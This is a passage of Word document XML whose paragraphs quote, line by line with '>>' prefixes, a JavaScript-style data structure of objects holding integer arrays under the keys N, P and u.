    <w:p w14:paraId="0990D481" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14351CD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F9AD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A037822" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 16, 20, 21, 31, 159, 284, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42245DE8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083377E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BC4F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42100EB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11A49F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E56AAA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439BBD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E74CBE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577EC9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD29D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FAD8AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5727D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [213, 254]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FFF0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C088C7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [11, 6, 2, 16, 5, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F024710" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456D1EBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [67, 90, 109, 131, 139, 159, 173, 252, 311, 317, 339]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640D7C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A1EF91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F704918" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B0F921" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 8, 11, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52635F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBAFB11" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EA6EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A968D37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB45CE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C2523" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009A428" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB507E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 4, 12, 14, 17, 139, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BFA4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DE74A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDEC5C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [4, 7, 8, 9, 10, 11, 13, 18, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355DFC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 5, 6, 12, 14, 15, 16, 17, 19, 47, 66, 135, 158, 159, 160, 191, 224, 252, 269, 311, 316, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076742B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5342CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2436A09F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCB326" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831AC46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAA962" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230F808" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA8263F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD00279" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [2, 3, 8, 17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FBAFA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E6F62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53FB02" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D177F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3D1FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBA488" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073FC81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAA786" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E97E2B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A2431" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B4D35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DC931" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [158]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C1598" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF55C49" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E21DF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA32341" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C4EC1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6204D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A01E9CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673A11D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF89320" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731184E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E2E8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC6BE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D545BDA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5854996E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EE5B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F14F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 7, 8, 9, 13, 200, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA32043" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0319ABD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE145F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F461B27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [119]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C92C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6E0E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E3816" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 9, 11, 15, 19, 24, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA72BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve"> 54, 55],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A0B931" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 5, 6, 7, 8, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22, 23, 25, 53, 131, 159, 197, 265, 297, 311, 317, 351, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED624B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0BAC0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6939FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2310C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66804B2F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D14242" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7C54E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26890752" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 19, 37, 89, 128, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EAA14A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A7F2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2DE5BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3A8A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9E776" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673156B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD84A79" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADF34E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5BA7D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0941C469" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18AE8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED898D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC2CBBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F634F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61B088" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE1B5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 14, 18, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C7CFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C35384" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67E0D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B299BE7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [35, 115]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664EDA3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A173085" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD60C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466222F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A3CE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3ECC2C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B89A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BB091" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C184AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B4D5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3E04B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E09295" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73644959" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695ED8C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE8D60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2172823B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FAC9B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
